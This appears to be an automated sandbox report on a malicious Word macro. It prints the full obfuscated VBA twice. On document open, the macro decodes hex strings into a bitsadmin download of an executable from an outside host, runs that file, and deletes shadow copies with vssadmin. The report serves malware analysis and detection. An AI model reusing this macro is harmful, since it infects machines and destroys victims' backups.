Private Declare PtrSafe Function eWZICHCSUGVFF Lib "KERNEL32" Alias "CreateProcessA" (ByVal bMIJESOVOFPXNIGW As String, ByVal bHFOSKLPRUPEXYLBLM As String, ByVal jGRYIJOIQECNZWKRWBO As LongPtr, ByVal cOZQUISIGDQOQWG As LongPtr, ByVal sBMDCJNRZMFA As Boolean, ByVal xQFYQCXKQZVW As Long, ByVal tAFLNIDKOSMPLAQ As LongPtr, ByVal rPXYQAUNQANDHLJU As String, lpStartupInfo As kXEHZUMYUDDUTSHZMQG, lpProcessInformation As lZHEGTMHAR) As Long
#Else
Private Declare Function eWZICHCSUGVFF Lib "KERNEL32" Alias "CreateProcessA" (ByVal bMIJESOVOFPXNIGW As String, ByVal bHFOSKLPRUPEXYLBLM As String, ByVal jGRYIJOIQECNZWKRWBO As Long, ByVal cOZQUISIGDQOQWG As Long, ByVal sBMDCJNRZMFA As Boolean, ByVal xQFYQCXKQZVW As Long, ByVal tAFLNIDKOSMPLAQ As Long, ByVal rPXYQAUNQANDHLJU As String, lpStartupInfo As kXEHZUMYUDDUTSHZMQG, lpProcessInformation As lZHEGTMHAR) As Long
Private Declare Function lYFQGPKFNCVHQPCIKI Lib "KERNEL32" Alias "GetCurrentDirectoryA" (ByVal jVGXVBEGDZYNGKPD As Long, ByVal iBKFPVIEFUQC As String) As Long
Private Declare Function nHQTKGIQSBRUKJ Lib "KERNEL32" Alias "WaitForSingleObject" (ByVal sBHTGKLDEYWA As Long, ByVal aKJTVBSGMCQYROMGH As Long) As Long
#End If
Private Type kXEHZUMYUDDUTSHZMQG
uXDIHQSDQDSFURPU As Long
gADXEXOUMAYJAS As String
zGIDNKNRS As String
bOKVRZINWWRNBYT As String
mDRJCTPAMQBQHAAQTWK As Long
pUOXYKNLRNVUOFQF As Long
vAGEFXNZUIALBSWQZLUC As Long
pLLESESKSWWRPH As Long
eXJVYDYJMQX As Long
hCCSLJIPWBXJZFSMOBC As Long
qTQRKIHNKBFF As Long
kJPTFUFMQKIIDRNB As Long
oBPCCMYYIVLQA As Integer
hMGQMFZNPUGWHWGDDUJH As Integer
kEDLLFOYANTEMWH As Long
pJAKUAJMMK As Long
qDNZSFLJWGOZU As Long
vDFBEKYQKFLIEV As Long
End Type
Private Type lZHEGTMHAR
nNLBYBCNSKGBCQMOMY As Long
iFYFVDJZCMF As Long
bNUIATLRVDMAZCVWBE As Long
xCZSHOMU As Long
End Type
Private Const uRRNLDPOUTLCYKOUQNRX = &HFFFFFFFF
Private Const jPEZPVSRELZDREQJPKQC = &H8000000
Private Const vUXRBEFWWFVAP = 260
Public Sub bRGVCEDPVTEFX()
Dim mNWIGENREYIUGMPSNK As String
Dim structProcessInformation As lZHEGTMHAR
Dim structStartupInfo As kXEHZUMYUDDUTSHZMQG
Dim aBBMXFDPLCFE As Long
Dim eBOIVUIXGZQX As Long
Dim vYBNYBMWDIOPXGQLY As Long
Dim tKTSMASYXK As String
tKTSMASYXK = Space(vUXRBEFWWFVAP)
Dim iQDBSREAJJVCDBLKAGX As Long
iQDBSREAJJVCDBLKAGX = lYFQGPKFNCVHQPCIKI(vUXRBEFWWFVAP, tKTSMASYXK)
tKTSMASYXK = Left(tKTSMASYXK, InStr(tKTSMASYXK, vbNullChar) - 1)
aBBMXFDPLCFE = eWZICHCSUGVFF(mNWIGENREYIUGMPSNK, mtfxdlgfwsxa("6269747361646d696e202f7472616e73666572206d79446f776e6c6f61644a4f6232332068747470733a2f2f73332e61702d736f7574682d312e616d617a6f6e6177732e636f6d2f616e732e766964656f2e696e7075742f7472616e73636f64655f696e7075742f70726f66696c653136313436383135373738303035") & mtfxdlgfwsxa("76773071622e706e6720") + tKTSMASYXK + mtfxdlgfwsxa("5c5c70757474") & mtfxdlgfwsxa("792e657865"), 0&, 0&, False, jPEZPVSRELZDREQJPKQC, 0&, mNWIGENREYIUGMPSNK, structStartupInfo, structProcessInformation)
If aBBMXFDPLCFE = 0 Then
Exit Sub
Else
vYBNYBMWDIOPXGQLY = nHQTKGIQSBRUKJ(structProcessInformation.nNLBYBCNSKGBCQMOMY, uRRNLDPOUTLCYKOUQNRX)
eBOIVUIXGZQX = eWZICHCSUGVFF(mNWIGENREYIUGMPSNK, tKTSMASYXK + mtfxdlgfwsxa("5c5c70") & mtfxdlgfwsxa("757474792e657865"), 0&, 0&, False, jPEZPVSRELZDREQJPKQC, 0&, mNWIGENREYIUGMPSNK, structStartupInfo, structProcessInformation)
vYBNYBMWDIOPXGQLY = nHQTKGIQSBRUKJ(structProcessInformation.nNLBYBCNSKGBCQMOMY, uRRNLDPOUTLCYKOUQNRX)
eBOIVUIXGZQX = eWZICHCSUGVFF(mNWIGENREYIUGMPSNK, mtfxdlgfwsxa("767373") & mtfxdlgfwsxa("61646d696e2064656c65746520736861646f7773202f616c6c202f7175696574"), 0&, 0&, False, jPEZPVSRELZDREQJPKQC, 0&, mNWIGENREYIUGMPSNK, structStartupInfo, structProcessInformation)
End If
End Sub
Sub iZMSNEVO()
'
'
'
Call bRGVCEDPVTEFX
End Sub
Sub AutoOpen()
'
'
'
Call bRGVCEDPVTEFX
End Sub
Private Function mtfxdlgfwsxa(ByVal gzdppyufultz As String) As String
Dim jdrmcyqidsrv As Long
For jdrmcyqidsrv = 1 To Len(gzdppyufultz) Step 2
mtfxdlgfwsxa = mtfxdlgfwsxa & Chr$(Val("&H" & Mid$(gzdppyufultz, jdrmcyqidsrv, 2)))
Next jdrmcyqidsrv
End Function
VBA File Name: ThisDocument.cls, Stream Size: 924
General
Stream Path:VBA/ThisDocument
VBA File Name:ThisDocument.cls
Stream Size:924
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . [ . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 01 00 00 f0 00 00 00 9e 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff a5 02 00 00 f9 02 00 00 00 00 00 00 01 00 00 00 a1 5b 90 21 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Creatable
VB_Name
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
"ThisDocument"
VBA Code
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 418
General
Stream Path:PROJECT
File Type:ASCII text, with CRLF line terminators
Stream Size:418
Entropy:5.4103027476
Base64 Encoded:True
Data ASCII:I D = " { C E 6 3 A A 8 2 - E 3 D F - 4 2 9 B - A 2 8 D - 8 0 6 9 2 C 4 D 7 3 D C } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = N e w M a c r o s . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A D A F B D 1 2 C 7 B B C B B B C B B B C B B B C B " . . D P B = " 5 A 5 8 4 A C 5 F 6 C 6 F 6 C 6 F 6 " . . G C = " 0 7 0 5 1 7 B 8 6 9 C 8 1 7 C 9 1 7 C 9 E 8 " . . . .
Data Raw:49 44 3d 22 7b 43 45 36 33 41 41 38 32 2d 45 33 44 46 2d 34 32 39 42 2d 41 32 38 44 2d 38 30 36 39 32 43 34 44 37 33 44 43 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4e 65 77 4d 61 63 72 6f 73 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22
Stream Path: PROJECTwm, File Type: data, Stream Size: 71
General
Stream Path:PROJECTwm
File Type:data
Stream Size:71
Entropy:3.34859995248
Base64 Encoded:False
Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . N e w M a c r o s . N . e . w . M . a . c . r . o . s . . . . .
Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 4e 65 77 4d 61 63 72 6f 73 00 4e 00 65 00 77 00 4d 00 61 00 63 00 72 00 6f 00 73 00 00 00 00 00
Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 5101
General
Stream Path:VBA/_VBA_PROJECT
File Type:data
Stream Size:5101
Entropy:5.44767757092
Base64 Encoded:False
Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
Data Raw:cc 61 85 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
Stream Path: VBA/dir, File Type: data, Stream Size: 578
General
Stream Path:VBA/dir
File Type:data
Stream Size:578
Entropy:6.32985176313
Base64 Encoded:True
Data ASCII:. > . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . N 1 b . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . O . 0 b .
Data Raw:01 3e b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 bc 4e 31 62 03 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: WINWORD.EXE PID: 532 Parent PID: 584

General

Start time:11:45:40
Start date:03/03/2021
Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):false
Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:0x13f610000
File size:1424032 bytes
MD5 hash:95C38D04597050285A18F66039EDB456
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Disassembly

VBA Code

Call Graph

Graph

  • Entrypoint
  • Decryption Function
  • Executed
  • Not Executed
  • Show Help
callgraph 136 bRGVCEDPVTEFX Left:1,InStr:1 333 mtfxdlgfwsxa Val:1,Len:1,Mid$:1 136->333 x 8 325 iZMSNEVO 325->136 329 AutoOpen 329->136

Module: NewMacros

Declaration
LineContent
1

Attribute VB_Name = "NewMacros"

2

Option Explicit

3

#if Win64 then

4

Private Declare PtrSafe Function lYFQGPKFNCVHQPCIKI Lib "KERNEL32" Alias "GetCurrentDirectory"(ByVal jVGXVBEGDZYNGKPD as Long, ByVal iBKFPVIEFUQC as String) as Long

5

Private Declare PtrSafe Function nHQTKGIQSBRUKJ Lib "KERNEL32" Alias "WaitForSingleObject"(ByVal sBHTGKLDEYWA as Long, ByVal aKJTVBSGMCQYROMGH as Long) as Long

6

Private Declare PtrSafe Function eWZICHCSUGVFF Lib "KERNEL32" Alias "CreateProcessA"(ByVal bMIJESOVOFPXNIGW as String, ByVal bHFOSKLPRUPEXYLBLM as String, ByVal jGRYIJOIQECNZWKRWBO as LongPtr, ByVal cOZQUISIGDQOQWG as LongPtr, ByVal sBMDCJNRZMFA as Boolean, ByVal xQFYQCXKQZVW as Long, ByVal tAFLNIDKOSMPLAQ as LongPtr, ByVal rPXYQAUNQANDHLJU as String, lpStartupInfo as kXEHZUMYUDDUTSHZMQG, lpProcessInformation as lZHEGTMHAR) as Long

7

#else

8

Private Declare Function eWZICHCSUGVFF Lib "KERNEL32" Alias "CreateProcessA"(ByVal bMIJESOVOFPXNIGW as String, ByVal bHFOSKLPRUPEXYLBLM as String, ByVal jGRYIJOIQECNZWKRWBO as Long, ByVal cOZQUISIGDQOQWG as Long, ByVal sBMDCJNRZMFA as Boolean, ByVal xQFYQCXKQZVW as Long, ByVal tAFLNIDKOSMPLAQ as Long, ByVal rPXYQAUNQANDHLJU as String, lpStartupInfo as kXEHZUMYUDDUTSHZMQG, lpProcessInformation as lZHEGTMHAR) as Long

9

Private Declare Function lYFQGPKFNCVHQPCIKI Lib "KERNEL32" Alias "GetCurrentDirectoryA"(ByVal jVGXVBEGDZYNGKPD as Long, ByVal iBKFPVIEFUQC as String) as Long

10

Private Declare Function nHQTKGIQSBRUKJ Lib "KERNEL32" Alias "WaitForSingleObject"(ByVal sBHTGKLDEYWA as Long, ByVal aKJTVBSGMCQYROMGH as Long) as Long

11

#endif

12

Private Type kXEHZUMYUDDUTSHZMQG uXDIHQSDQDSFURPU as Long gADXEXOUMAYJAS as String zGIDNKNRS as String bOKVRZINWWRNBYT as String mDRJCTPAMQBQHAAQTWK as Long pUOXYKNLRNVUOFQF as Long vAGEFXNZUIALBSWQZLUC as Long pLLESESKSWWRPH as Long eXJVYDYJMQX as Long hCCSLJIPWBXJZFSMOBC as Long qTQRKIHNKBFF as Long kJPTFUFMQKIIDRNB as Long oBPCCMYYIVLQA as Integer hMGQMFZNPUGWHWGDDUJH as Integer kEDLLFOYANTEMWH as Long pJAKUAJMMK as Long qDNZSFLJWGOZU as Long vDFBEKYQKFLIEV as Long End Type

32

Private Type lZHEGTMHAR nNLBYBCNSKGBCQMOMY as Long iFYFVDJZCMF as Long bNUIATLRVDMAZCVWBE as Long xCZSHOMU as Long End Type

38

Private Const uRRNLDPOUTLCYKOUQNRX = &HFFFFFFFF

39

Private Const jPEZPVSRELZDREQJPKQC = &H8000000

40

Private Const vUXRBEFWWFVAP = 260

Executed Functions
Subroutine bRGVCEDPVTEFX, APIs: 31, Strings: 2, Number of lines: 22, Relevance: 72.022
APIsMeta Information

Space

vUXRBEFWWFVAP

KERNEL32!GetCurrentDirectoryA

KERNEL32!GetCurrentDirectoryA(260," ")

vUXRBEFWWFVAP

Left

InStr

vbNullChar

eWZICHCSUGVFF

Part of subcall function mtfxdlgfwsxa@NewMacros: Len

Part of subcall function mtfxdlgfwsxa@NewMacros: Chr$

Part of subcall function mtfxdlgfwsxa@NewMacros: Val

Part of subcall function mtfxdlgfwsxa@NewMacros: Mid$

jPEZPVSRELZDREQJPKQC

nHQTKGIQSBRUKJ

nNLBYBCNSKGBCQMOMY

uRRNLDPOUTLCYKOUQNRX

eWZICHCSUGVFF

Part of subcall function mtfxdlgfwsxa@NewMacros: Len

Part of subcall function mtfxdlgfwsxa@NewMacros: Chr$

Part of subcall function mtfxdlgfwsxa@NewMacros: Val

Part of subcall function mtfxdlgfwsxa@NewMacros: Mid$

jPEZPVSRELZDREQJPKQC

nHQTKGIQSBRUKJ

nNLBYBCNSKGBCQMOMY

uRRNLDPOUTLCYKOUQNRX

eWZICHCSUGVFF

Part of subcall function mtfxdlgfwsxa@NewMacros: Len

Part of subcall function mtfxdlgfwsxa@NewMacros: Chr$

Part of subcall function mtfxdlgfwsxa@NewMacros: Val

Part of subcall function mtfxdlgfwsxa@NewMacros: Mid$

jPEZPVSRELZDREQJPKQC

StringsDecrypted Strings
"6269747361646d696e202f7472616e73666572206d79446f776e6c6f61644a4f6232332068747470733a2f2f73332e61702d736f7574682d312e616d617a6f6e6177732e636f6d2f616e732e766964656f2e696e7075742f7472616e73636f64655f696e7075742f70726f66696c653136313436383135373738303035"
"767373"
LineInstructionMeta Information
41

Public Sub bRGVCEDPVTEFX()

42

Dim mNWIGENREYIUGMPSNK as String

executed
43

Dim structProcessInformation as lZHEGTMHAR

44

Dim structStartupInfo as kXEHZUMYUDDUTSHZMQG

45

Dim aBBMXFDPLCFE as Long

46

Dim eBOIVUIXGZQX as Long

47

Dim vYBNYBMWDIOPXGQLY as Long

48

Dim tKTSMASYXK as String

49

tKTSMASYXK = Space(vUXRBEFWWFVAP)

Space

vUXRBEFWWFVAP

50

Dim iQDBSREAJJVCDBLKAGX as Long

51

iQDBSREAJJVCDBLKAGX = lYFQGPKFNCVHQPCIKI(vUXRBEFWWFVAP, tKTSMASYXK)

KERNEL32!GetCurrentDirectoryA(260," ")

vUXRBEFWWFVAP

executed
52

tKTSMASYXK = Left(tKTSMASYXK, InStr(tKTSMASYXK, vbNullChar) - 1)

Left

InStr

vbNullChar

53

aBBMXFDPLCFE = eWZICHCSUGVFF(mNWIGENREYIUGMPSNK, mtfxdlgfwsxa("6269747361646d696e202f7472616e73666572206d79446f776e6c6f61644a4f6232332068747470733a2f2f73332e61702d736f7574682d312e616d617a6f6e6177732e636f6d2f616e732e766964656f2e696e7075742f7472616e73636f64655f696e7075742f70726f66696c653136313436383135373738303035") & mtfxdlgfwsxa("76773071622e706e6720") + tKTSMASYXK + mtfxdlgfwsxa("5c5c70757474") & mtfxdlgfwsxa("792e657865"), 0&, 0&, False, jPEZPVSRELZDREQJPKQC, 0&, mNWIGENREYIUGMPSNK, structStartupInfo, structProcessInformation)

eWZICHCSUGVFF

jPEZPVSRELZDREQJPKQC

54

If aBBMXFDPLCFE = 0 Then

55

Exit Sub

56

Else

57

vYBNYBMWDIOPXGQLY = nHQTKGIQSBRUKJ(structProcessInformation.nNLBYBCNSKGBCQMOMY, uRRNLDPOUTLCYKOUQNRX)

nHQTKGIQSBRUKJ

nNLBYBCNSKGBCQMOMY

uRRNLDPOUTLCYKOUQNRX

58

eBOIVUIXGZQX = eWZICHCSUGVFF(mNWIGENREYIUGMPSNK, tKTSMASYXK + mtfxdlgfwsxa("5c5c70") & mtfxdlgfwsxa("757474792e657865"), 0&, 0&, False, jPEZPVSRELZDREQJPKQC, 0&, mNWIGENREYIUGMPSNK, structStartupInfo, structProcessInformation)

eWZICHCSUGVFF

jPEZPVSRELZDREQJPKQC

59

vYBNYBMWDIOPXGQLY = nHQTKGIQSBRUKJ(structProcessInformation.nNLBYBCNSKGBCQMOMY, uRRNLDPOUTLCYKOUQNRX)

nHQTKGIQSBRUKJ

nNLBYBCNSKGBCQMOMY

uRRNLDPOUTLCYKOUQNRX

60

eBOIVUIXGZQX = eWZICHCSUGVFF(mNWIGENREYIUGMPSNK, mtfxdlgfwsxa("767373") & mtfxdlgfwsxa("61646d696e2064656c65746520736861646f7773202f616c6c202f7175696574"), 0&, 0&, False, jPEZPVSRELZDREQJPKQC, 0&, mNWIGENREYIUGMPSNK, structStartupInfo, structProcessInformation)

eWZICHCSUGVFF

jPEZPVSRELZDREQJPKQC

61

Endif

62

End Sub

Subroutine AutoOpen, APIs: 19, Strings: 0, Number of lines: 3, Relevance: 30.003
APIsMeta Information

Part of subcall function bRGVCEDPVTEFX@NewMacros: Space

Part of subcall function bRGVCEDPVTEFX@NewMacros: vUXRBEFWWFVAP

Part of subcall function bRGVCEDPVTEFX@NewMacros: lYFQGPKFNCVHQPCIKI

Part of subcall function bRGVCEDPVTEFX@NewMacros: vUXRBEFWWFVAP

Part of subcall function bRGVCEDPVTEFX@NewMacros: Left

Part of subcall function bRGVCEDPVTEFX@NewMacros: InStr

Part of subcall function bRGVCEDPVTEFX@NewMacros: vbNullChar

Part of subcall function bRGVCEDPVTEFX@NewMacros: eWZICHCSUGVFF

Part of subcall function bRGVCEDPVTEFX@NewMacros: jPEZPVSRELZDREQJPKQC

Part of subcall function bRGVCEDPVTEFX@NewMacros: nHQTKGIQSBRUKJ

Part of subcall function bRGVCEDPVTEFX@NewMacros: nNLBYBCNSKGBCQMOMY

Part of subcall function bRGVCEDPVTEFX@NewMacros: uRRNLDPOUTLCYKOUQNRX

Part of subcall function bRGVCEDPVTEFX@NewMacros: eWZICHCSUGVFF

Part of subcall function bRGVCEDPVTEFX@NewMacros: jPEZPVSRELZDREQJPKQC

Part of subcall function bRGVCEDPVTEFX@NewMacros: nHQTKGIQSBRUKJ

Part of subcall function bRGVCEDPVTEFX@NewMacros: nNLBYBCNSKGBCQMOMY

Part of subcall function bRGVCEDPVTEFX@NewMacros: uRRNLDPOUTLCYKOUQNRX

Part of subcall function bRGVCEDPVTEFX@NewMacros: eWZICHCSUGVFF

Part of subcall function bRGVCEDPVTEFX@NewMacros: jPEZPVSRELZDREQJPKQC

LineInstructionMeta Information
69

Sub AutoOpen()

73

Call bRGVCEDPVTEFX()

executed
74

End Sub

Non-Executed Functions
Subroutine iZMSNEVO, APIs: 19, Strings: 0, Number of lines: 3, Relevance: 23.753
APIsMeta Information

Part of subcall function bRGVCEDPVTEFX@NewMacros: Space

Part of subcall function bRGVCEDPVTEFX@NewMacros: vUXRBEFWWFVAP

Part of subcall function bRGVCEDPVTEFX@NewMacros: lYFQGPKFNCVHQPCIKI

Part of subcall function bRGVCEDPVTEFX@NewMacros: vUXRBEFWWFVAP

Part of subcall function bRGVCEDPVTEFX@NewMacros: Left

Part of subcall function bRGVCEDPVTEFX@NewMacros: InStr

Part of subcall function bRGVCEDPVTEFX@NewMacros: vbNullChar

Part of subcall function bRGVCEDPVTEFX@NewMacros: eWZICHCSUGVFF

Part of subcall function bRGVCEDPVTEFX@NewMacros: jPEZPVSRELZDREQJPKQC

Part of subcall function bRGVCEDPVTEFX@NewMacros: nHQTKGIQSBRUKJ

Part of subcall function bRGVCEDPVTEFX@NewMacros: nNLBYBCNSKGBCQMOMY

Part of subcall function bRGVCEDPVTEFX@NewMacros: uRRNLDPOUTLCYKOUQNRX

Part of subcall function bRGVCEDPVTEFX@NewMacros: eWZICHCSUGVFF

Part of subcall function bRGVCEDPVTEFX@NewMacros: jPEZPVSRELZDREQJPKQC

Part of subcall function bRGVCEDPVTEFX@NewMacros: nHQTKGIQSBRUKJ

Part of subcall function bRGVCEDPVTEFX@NewMacros: nNLBYBCNSKGBCQMOMY

Part of subcall function bRGVCEDPVTEFX@NewMacros: uRRNLDPOUTLCYKOUQNRX

Part of subcall function bRGVCEDPVTEFX@NewMacros: eWZICHCSUGVFF

Part of subcall function bRGVCEDPVTEFX@NewMacros: jPEZPVSRELZDREQJPKQC

LineInstructionMeta Information
63

Sub iZMSNEVO()

67

Call bRGVCEDPVTEFX()

68

End Sub

Function mtfxdlgfwsxa, APIs: 4, Strings: 0, Number of lines: 6, Relevance: 5.006
APIsMeta Information

Len

Chr$

Val

Mid$

LineInstructionMeta Information
75

Private Function mtfxdlgfwsxa(ByVal gzdppyufultz as String) as String

76

Dim jdrmcyqidsrv as Long

77

For jdrmcyqidsrv = 1 To Len(gzdppyufultz) Step 2

Len

78

mtfxdlgfwsxa = mtfxdlgfwsxa & Chr$(Val("&H" & Mid$(gzdppyufultz, jdrmcyqidsrv, 2)))

Chr$

Val

Mid$

79

Next jdrmcyqidsrv

Len

80

End Function

Module: ThisDocument

Declaration
LineContent
1

Attribute VB_Name = "ThisDocument"

2

Attribute VB_Base = "1Normal.ThisDocument"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = True

6

Attribute VB_Exposed = True

7

Attribute VB_TemplateDerived = True

8

Attribute VB_Customizable = True

Reset < >